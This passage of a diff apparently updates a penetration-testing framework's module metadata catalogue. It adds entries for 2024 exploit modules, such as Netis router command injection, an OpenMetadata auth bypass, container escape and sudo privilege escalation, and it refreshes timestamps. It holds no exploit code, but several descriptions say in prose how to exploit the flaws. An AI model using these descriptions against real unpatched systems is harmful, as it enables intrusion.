+    "description": "A vulnerability existed in the new Empire (maintained by BC Security)\n          prior to commit e73e883 (<v5.9.3) or the original PowerShellEmpire\n          server prior to commit f030cf62 which would allow an arbitrary file\n          to be written to an attacker controlled location with the permissions\n          of the Empire server.\n\n          This exploit will write the payload to /tmp/ directory followed by a\n          cron.d file to execute the payload.",
    "references": [
-      "URL-http://www.harmj0y.net/blog/empire/empire-fails/"
+      "CVE-2024-6127",
+      "URL-https://blog.harmj0y.net/empire/empire-fails/",
+      "URL-https://aceresponder.com/blog/exploiting-empire-c2-framework",
+      "URL-https://github.com/ACE-Responder/Empire-C2-RCE-PoC/tree/main"
    ],
    "platform": "Linux,Python",
    "arch": "",
@@ -70990,7 +71921,7 @@
      "Linux x86",
      "Linux x64"
    ],
-    "mod_time": "2021-02-19 20:35:33 +0000",
+    "mod_time": "2024-07-31 12:54:09 +0000",
    "path": "/modules/exploits/linux/http/empire_skywalker.rb",
    "is_install_path": true,
    "ref_name": "linux/http/empire_skywalker",
@@ -71840,7 +72771,7 @@
    "targets": [
      "FortiOS"
    ],
-    "mod_time": "2022-10-18 00:51:28 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/linux/http/fortinet_authentication_bypass_cve_2022_40684.rb",
    "is_install_path": true,
    "ref_name": "linux/http/fortinet_authentication_bypass_cve_2022_40684",
@@ -71961,7 +72892,7 @@
      "Linux ",
      "Unix Command"
    ],
-    "mod_time": "2023-02-24 13:33:10 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/linux/http/froxlor_log_path_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/froxlor_log_path_rce",
@@ -72994,7 +73925,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2022-02-25 08:32:06 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/linux/http/hikvision_cve_2021_36260_blind.rb",
    "is_install_path": true,
    "ref_name": "linux/http/hikvision_cve_2021_36260_blind",
@@ -76818,6 +77749,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/netis_unauth_rce_cve_2024_22729": {
+    "name": "Netis router MW5360 unauthenticated RCE.",
+    "fullname": "exploit/linux/http/netis_unauth_rce_cve_2024_22729",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-01-11",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Adhikara13"
+    ],
+    "description": "Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.\n          The vulnerability stems from improper handling of the \"password\" parameter within the router's web interface.\n          The router's login page authorization can be bypassed by simply deleting the authorization header,\n          leading to the vulnerability. All router firmware versions up to `V1.0.1.3442` are vulnerable.\n          Attackers can inject a command in the 'password' parameter, encoded in base64, to exploit the command injection\n          vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker\n          to take control of the router.",
+    "references": [
+      "CVE-2024-22729",
+      "URL-https://attackerkb.com/topics/MvCphsf4LN/cve-2024-22729",
+      "URL-https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md"
+    ],
+    "platform": "Linux",
+    "arch": "mipsle",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Dropper"
+    ],
+    "mod_time": "2024-06-12 18:57:29 +0000",
+    "path": "/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/netis_unauth_rce_cve_2024_22729",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/netsweeper_webadmin_unixlogin": {
    "name": "Netsweeper WebAdmin unixlogin.php Python Code Injection",
    "fullname": "exploit/linux/http/netsweeper_webadmin_unixlogin",
@@ -77198,6 +78191,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/openmetadata_auth_bypass_rce": {
+    "name": "OpenMetadata authentication bypass and SpEL injection exploit chain",
+    "fullname": "exploit/linux/http/openmetadata_auth_bypass_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-15",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Alvaro Muñoz alias pwntester (https://github.com/pwntester)"
+    ],
+    "description": "OpenMetadata is a unified platform for discovery, observability, and governance powered\n          by a central metadata repository, in-depth lineage, and seamless team collaboration.\n          This module chains two vulnerabilities that exist in the OpenMetadata aplication.\n          The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens.\n          It misuses the `JwtFilter` that checks the path of the url endpoint against a list of excluded\n          endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters\n          to make any path contain any arbitrary strings that will match the excluded endpoint condition\n          and therefore will be processed with no JWT validation allowing an attacker to bypass the\n          authentication mechanism and reach any arbitrary endpoint.\n          By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection\n          at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers\n          are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any\n          authentication.\n          OpenMetadata versions `1.2.3` and below are vulnerable.",
+    "references": [
+      "CVE-2024-28255",
+      "CVE-2024-28254",
+      "URL-https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata/",
+      "URL-https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255",
+      "URL-https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 8585,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-08-06 21:00:06 +0000",
+    "path": "/modules/exploits/linux/http/openmetadata_auth_bypass_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/openmetadata_auth_bypass_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/opennms_horizon_authenticated_rce": {
    "name": "OpenNMS Horizon Authenticated RCE",
    "fullname": "exploit/linux/http/opennms_horizon_authenticated_rce",
@@ -78330,6 +79387,67 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/progress_flowmon_unauth_cmd_injection": {
+    "name": "Flowmon Unauthenticated Command Injection",
+    "fullname": "exploit/linux/http/progress_flowmon_unauth_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-04-23",
+    "type": "exploit",
+    "author": [
+      "Dave Yesland with Rhino Security Labs"
+    ],
+    "description": "This module exploits an unauthenticated command injection vulnerability in Progress Flowmon\n          versions before v12.03.02.",
+    "references": [
+      "CVE-2024-2389",
+      "URL-https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/",
+      "URL-https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-05-28 16:29:55 +0000",
+    "path": "/modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/progress_flowmon_unauth_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/progress_kemp_loadmaster_unauth_cmd_injection": {
    "name": "Kemp LoadMaster Unauthenticated Command Injection",
    "fullname": "exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection",
@@ -79970,7 +81088,7 @@
      "Linux (x64)",
      "Linux (cmd)"
    ],
-    "mod_time": "2021-10-22 22:11:51 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
    "path": "/modules/exploits/linux/http/suitecrm_log_file_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/suitecrm_log_file_rce",
@@ -82112,7 +83230,7 @@
    "targets": [
      "VMware vRealize Log Insight < v8.10.2"
    ],
-    "mod_time": "2023-09-12 10:16:13 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
    "path": "/modules/exploits/linux/http/vmware_vrli_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/vmware_vrli_rce",
@@ -83572,7 +84690,7 @@
      "Linux Dropper",
      "Interactive SSH"
    ],
-    "mod_time": "2023-05-10 07:46:11 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/zyxel_lfi_unauth_ssh_rce",
@@ -83594,6 +84712,67 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/zyxel_parse_config_rce": {
+    "name": "Zyxel parse_config.py Command Injection",
+    "fullname": "exploit/linux/http/zyxel_parse_config_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2024-01-24",
+    "type": "exploit",
+    "author": [
+      "SSD Secure Disclosure technical team",
+      "jheysel-r7"
+    ],
+    "description": "This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series.\n          The affected firmware versions depend on the device module, see this module's documentation for more details.\n\n          Note this module was unable to be tested against a real Zyxel device and was tested against a mock environment.\n          If you run into any issues testing this in a real environment we kindly ask you raise an issue in\n          metasploit's github repository: https://github.com/rapid7/metasploit-framework/issues/new/choose",
+    "references": [
+      "URL-https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/",
+      "CVE-2023-33012"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2024-07-03 13:51:50 +0000",
+    "path": "/modules/exploits/linux/http/zyxel_parse_config_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/zyxel_parse_config_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/zyxel_ztp_rce": {
    "name": "Zyxel Firewall ZTP Unauthenticated Command Injection",
    "fullname": "exploit/linux/http/zyxel_ztp_rce",
@@ -85346,6 +86525,65 @@

    ]
  },
+  "exploit_linux/local/docker_privileged_container_kernel_escape": {
+    "name": "Docker Privileged Container Kernel Escape",
+    "fullname": "exploit/linux/local/docker_privileged_container_kernel_escape",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2014-05-01",
+    "type": "exploit",
+    "author": [
+      "Nick Cottrell <Rad10Logic>",
+      "Eran Ayalon",
+      "Ilan Sokol"
+    ],
+    "description": "This module performs a container escape onto the host as the daemon\n            user. It takes advantage of the SYS_MODULE capability. If that\n            exists and the linux headers are available to compile on the target,\n            then we can escape onto the host.",
+    "references": [
+      "URL-https://www.cybereason.com/blog/container-escape-all-you-need-is-cap-capabilities",
+      "URL-https://github.com/maK-/reverse-shell-access-kernel-module"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-05-01 13:30:16 +0000",
+    "path": "/modules/exploits/linux/local/docker_privileged_container_kernel_escape.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/docker_privileged_container_kernel_escape",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": [
+
+    ]
+  },
  "exploit_linux/local/docker_runc_escape": {
    "name": "Docker Container Escape Via runC Overwrite",
    "fullname": "exploit/linux/local/docker_runc_escape",
@@ -86790,6 +88028,122 @@

    ]
  },
+  "exploit_linux/local/progress_flowmon_sudo_privesc_2024": {
+    "name": "Progress Flowmon Local sudo privilege escalation",
+    "fullname": "exploit/linux/local/progress_flowmon_sudo_privesc_2024",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-19",
+    "type": "exploit",
+    "author": [
+      "Dave Yesland with Rhino Security Labs"
+    ],
+    "description": "This module abuses a feature of the sudo command on Progress Flowmon.\n          Certain binary files are allowed to automatically elevate\n          with the sudo command.  This is based off of the file name.  This\n          includes executing a PHP command with a specific file name. If the\n          file is overwritten with PHP code it can be used to elevate privileges\n          to root. Progress Flowmon up to at least version 12.3.5 is vulnerable.",
+    "references": [
+      "URL-https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/",
+      "URL-https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-05-29 08:39:06 +0000",
+    "path": "/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/progress_flowmon_sudo_privesc_2024",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": [
+
+    ]
+  },
+  "exploit_linux/local/progress_kemp_loadmaster_sudo_privesc_2024": {
+    "name": "Kemp LoadMaster Local sudo privilege escalation",
+    "fullname": "exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-19",
+    "type": "exploit",
+    "author": [
+      "Dave Yesland with Rhino Security Labs",
+      "bwatters-r7"
+    ],
+    "description": "This module abuses a feature of the sudo command on Progress Kemp\n          LoadMaster.  Certain binary files are allowed to automatically elevate\n          with the sudo command.  This is based off of the file name.  Some files\n          have this permission are not write-protected from the default 'bal' user.\n          As such, if the file is overwritten with an arbitrary file, it will still\n          auto-elevate.  This module overwrites the /bin/loadkeys file with another\n          executable.",
+    "references": [
+      "URL-https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/",
+      "URL-https://kemptechnologies.com/kemp-load-balancers"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Dropper",
+      "Command"
+    ],
+    "mod_time": "2024-05-10 08:54:23 +0000",
+    "path": "/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/progress_kemp_loadmaster_sudo_privesc_2024",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": [
+
+    ]
+  },
  "exploit_linux/local/ptrace_sudo_token_priv_esc": {
    "name": "ptrace Sudo Token Privilege Escalation",
    "fullname": "exploit/linux/local/ptrace_sudo_token_priv_esc",
@@ -90345,7 +91699,7 @@
      "Minions (Python payload)",
      "Minions (Unix command)"
    ],
-    "mod_time": "2021-09-17 16:34:46 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
    "path": "/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/saltstack_salt_unauth_rce",
@@ -90469,7 +91823,7 @@
    "targets": [
      "TP-Link Archer A7/C7 (AC1750) v5 (firmware up to 201029/30)"
    ],
-    "mod_time": "2023-02-08 15:46:07 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/tplink_archer_a7_c7_lan_rce",
@@ -92097,7 +93451,7 @@
    "targets": [
      "Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40"
    ],
-    "mod_time": "2022-04-18 20:09:52 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/microfocus_obr_shrboadmin",
@@ -95605,6 +96959,58 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/fileformat/ghostscript_format_string_cve_2024_29510": {
+    "name": "Ghostscript Command Execution via Format String",
+    "fullname": "exploit/multi/fileformat/ghostscript_format_string_cve_2024_29510",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-14",
+    "type": "exploit",
+    "author": [
+      "Thomas Rinsma",
+      "Christophe De La fuente"
+    ],
+    "description": "This module exploits a format string vulnerability in Ghostscript\n          versions before 10.03.1 to achieve a SAFER sandbox bypass and execute\n          arbitrary commands. This vulnerability is reachable via libraries such as\n          ImageMagick.\n\n          This exploit only works against Ghostscript versions 10.03.0 and\n          10.01.2. Some offsets adjustement will probably be needed to make it\n          work with other versions.",
+    "references": [
+      "CVE-2024-29510",
+      "URL-https://bugs.ghostscript.com/show_bug.cgi?id=707662",
+      "URL-https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd, x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Linux Command"
+    ],
+    "mod_time": "2024-07-19 16:19:56 +0000",
+    "path": "/modules/exploits/multi/fileformat/ghostscript_format_string_cve_2024_29510.rb",
+    "is_install_path": true,
+    "ref_name": "multi/fileformat/ghostscript_format_string_cve_2024_29510",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/fileformat/gitlens_local_config_exec": {
    "name": "GitLens Git Local Configuration Exec",
    "fullname": "exploit/multi/fileformat/gitlens_local_config_exec",
@@ -95907,7 +97313,7 @@
      "Microsoft Office Word on Windows",
      "Microsoft Office Word on Mac OS X (Python)"
    ],
-    "mod_time": "2022-03-10 18:03:35 +0000",
+    "mod_time": "2024-05-28 14:01:31 +0000",
    "path": "/modules/exploits/multi/fileformat/office_word_macro.rb",
    "is_install_path": true,
    "ref_name": "multi/fileformat/office_word_macro",
@@ -96739,7 +98145,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2024-01-05 22:31:51 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
    "path": "/modules/exploits/multi/http/apache_commons_text4shell.rb",
    "is_install_path": true,
    "ref_name": "multi/http/apache_commons_text4shell",
@@ -97209,6 +98615,68 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/apache_ofbiz_forgot_password_directory_traversal": {
+    "name": "Apache OFBiz Forgot Password Directory Traversal",
+    "fullname": "exploit/multi/http/apache_ofbiz_forgot_password_directory_traversal",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-05-30",
+    "type": "exploit",
+    "author": [
+      "Mr-xn",
+      "jheysel-r7"
+    ],
+    "description": "Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable\n          endpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint which in\n          turn allows for remote code execution in the context of the user running the application.",
+    "references": [
+      "URL-https://github.com/Mr-xn/CVE-2024-32113",
+      "URL-https://xz.aliyun.com/t/14733?time__1311=mqmx9Qwx0WDsd5YK0%3Dai%3Dmd7KbxGupD&alichlgref=https%3A%2F%2Fgithub.com%2FMr-xn%2FCVE-2024-32113",
+      "CVE-2024-32113"
+    ],
+    "platform": "Linux,Windows",
+    "arch": "cmd",
+    "rport": 8443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Command",
+      "Windows Command"
+    ],
+    "mod_time": "2024-06-14 16:59:55 +0000",
+    "path": "/modules/exploits/multi/http/apache_ofbiz_forgot_password_directory_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/apache_ofbiz_forgot_password_directory_traversal",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/apache_rocketmq_update_config": {
    "name": "Apache RocketMQ update config RCE",
    "fullname": "exploit/multi/http/apache_rocketmq_update_config",
@@ -97558,6 +99026,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/atlassian_confluence_rce_cve_2024_21683": {
+    "name": "Atlassian Confluence Administrator Code Macro Remote Code Execution",
+    "fullname": "exploit/multi/http/atlassian_confluence_rce_cve_2024_21683",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-05-21",
+    "type": "exploit",
+    "author": [
+      "Ankita Sawlani",
+      "Huong Kieu",
+      "W01fh4cker",
+      "remmons-r7"
+    ],
+    "description": "This module exploits an authenticated administrator-level vulnerability in Atlassian Confluence,\n          tracked as CVE-2024-21683. The vulnerability exists due to the Rhino script engine parser evaluating\n          tainted data from uploaded text files. This facilitates arbitrary code execution. This exploit will\n          authenticate, validate user privileges, extract the underlying host OS information, then trigger\n          remote code execution. All versions of Confluence prior to 7.17 are affected, as are many versions\n          up to 8.9.0.",
+    "references": [
+      "CVE-2024-21683",
+      "URL-https://jira.atlassian.com/browse/CONFSERVER-95832",
+      "URL-https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated",
+      "URL-https://github.com/W01fh4cker/CVE-2024-21683-RCE"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd",
+    "rport": 8090,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Default"
+    ],
+    "mod_time": "2024-07-10 20:45:53 +0000",
+    "path": "/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/atlassian_confluence_rce_cve_2024_21683",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/atlassian_confluence_unauth_backup": {
    "name": "Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)",
    "fullname": "exploit/multi/http/atlassian_confluence_unauth_backup",
@@ -97845,7 +99377,7 @@
      "Linux",
      "Windows"
    ],
-    "mod_time": "2023-02-03 18:12:53 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/multi/http/atutor_upload_traversal.rb",
    "is_install_path": true,
    "ref_name": "multi/http/atutor_upload_traversal",
@@ -97919,6 +99451,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/avideo_wwbnindex_unauth_rce": {
+    "name": "AVideo WWBNIndex Plugin Unauthenticated RCE",
+    "fullname": "exploit/multi/http/avideo_wwbnindex_unauth_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-04-09",
+    "type": "exploit",
+    "author": [
+      "Valentin Lobstein"
+    ],
+    "description": "This module exploits an unauthenticated remote code execution (RCE) vulnerability\n          in the WWBNIndex plugin of the AVideo platform. The vulnerability exists within the\n          `submitIndex.php` file, where user-supplied input is passed directly to the `require()`\n          function without proper sanitization. By exploiting this, an attacker can leverage the\n          PHP filter chaining technique to execute arbitrary PHP code on the server. This allows\n          for the execution of commands and control over the affected system. The exploit is\n          particularly dangerous because it does not require authentication, making it possible\n          for any remote attacker to exploit this vulnerability.",
+    "references": [
+      "CVE-2024-31819",
+      "URL-https://github.com/WWBN/AVideo",
+      "URL-https://chocapikk.com/posts/2024/cve-2024-31819"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "php, cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic",
+      "PHP In-Memory",
+      "Unix In-Memory",
+      "Windows In-Memory"
+    ],
+    "mod_time": "2024-05-15 22:13:53 +0000",
+    "path": "/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/avideo_wwbnindex_unauth_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/axis2_deployer": {
    "name": "Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)",
    "fullname": "exploit/multi/http/axis2_deployer",
@@ -98256,6 +99852,70 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/cacti_package_import_rce": {
+    "name": "Cacti Import Packages RCE",
+    "fullname": "exploit/multi/http/cacti_package_import_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-05-12",
+    "type": "exploit",
+    "author": [
+      "Egidio Romano",
+      "Christophe De La Fuente"
+    ],
+    "description": "This exploit module leverages an arbitrary file write vulnerability\n          (CVE-2024-25641) in Cacti versions prior to 1.2.27 to achieve RCE. It\n          abuses the `Import Packages` feature to upload a specially crafted\n          package that embeds a PHP file. Cacti will extract this file to an\n          accessible location. The module finally triggers the payload to execute\n          arbitrary PHP code in the context of the user running the web server.\n\n          Authentication is needed and the account must have access to the\n          `Import Packages` feature. This is granted by setting the `Import\n          Templates` permission in the `Template Editor` section.",
+    "references": [
+      "URL-https://karmainsecurity.com/KIS-2024-04",
+      "URL-https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88",
+      "CVE-2024-25641"
+    ],
+    "platform": "Windows",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Linux Command",
+      "Windows Command"
+    ],
+    "mod_time": "2024-06-12 19:15:01 +0000",
+    "path": "/modules/exploits/multi/http/cacti_package_import_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/cacti_package_import_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
